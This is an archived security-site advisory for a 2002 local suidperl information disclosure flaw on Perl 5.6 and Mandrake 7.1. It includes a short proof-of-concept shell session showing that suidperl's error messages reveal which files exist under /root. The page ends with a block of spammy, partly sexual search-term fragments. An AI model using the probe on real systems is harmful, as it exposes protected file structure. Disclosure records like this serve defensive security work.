about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SuidPerl Information Disclosure Vulnerability


Title SuidPerl Information Disclosure Vulnerability
Published 2002-11-29-12:00AM
Updated 2002-11-30-04:21PM
Class Access Validation Error
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery of this vulnerability credited to zen-parse.
Vulnerable  Larry Wall Perl 5.6
MandrakeSoft Linux Mandrake 7.1
Not Vulnerable  
Code   The following proof of concept was provided:

bash-2.04$ ls -ald /root
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ls /root/.bashrc
ls: /root/.bashrc: Permission denied
bash-2.04$ suidperl /root/.bashrc
Script is not setuid/setgid in suidperl
bash-2.04$ suidperl /root/nonexistantfile
Can't open perl script "/root/nonexistantfile": No such file or directory
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 05:54:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
accragirls fxyusen.co 3.0.15 maxcpm.inf naruto.xxx free downl www.89six. Login to C phpbb plus Hotgirlse www.mrd168 Madonna bu Com_compro Hotshot+ph yxuwo.cn Powered b Alisiamach T...roc/se news for c www.brazil Fedora cor SSH-1.99-O free str exploit ph Kanpurgirl tamil actr t467t Nued kajol www.vibe.c zeroboard. ....php?a Madonna.se www.looseo sex update components www.hbhty5 Joomla! is Www.phoner mail marsh components 200 /compo sendmail 8 www.17ccc. Waptrick.C phpBB por www.sexind zeroboard. Nafa urbac how fuck